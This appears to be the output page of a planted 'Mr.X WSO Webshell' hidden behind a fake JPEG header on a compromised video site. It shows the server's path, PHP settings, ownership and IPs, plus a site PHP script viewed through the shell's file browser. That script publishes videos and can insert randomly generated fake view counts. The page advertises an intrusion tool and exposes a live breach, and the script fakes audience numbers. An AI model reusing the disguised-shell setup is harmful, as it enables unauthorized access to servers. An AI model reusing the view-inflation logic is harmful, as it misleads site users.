����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 19:45:37 1999.30 GB Free: 67.93 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?php
include('db.php');
if(is_numeric($_GET['id'])) {
$id = (int)$_GET['id'];
dbQuery("UPDATE content SET enabled = 1, scheduled_date = NOW(), encoded_date = NOW() WHERE record_num = '$id'");
updateRelatedVideos($id);
updateContentSearch($id);
generateSlug($id);
if($randomViewsEnabled && is_numeric($randomViewsMin) && is_numeric($randomViewsMax)) {
$newViews = rand($randomViewsMin,$randomViewsMax);
dbQuery("UPDATE content_views SET views = '$newViews' WHERE content = '$id'");
}
}
header("Location: publish.php");
exit();
?>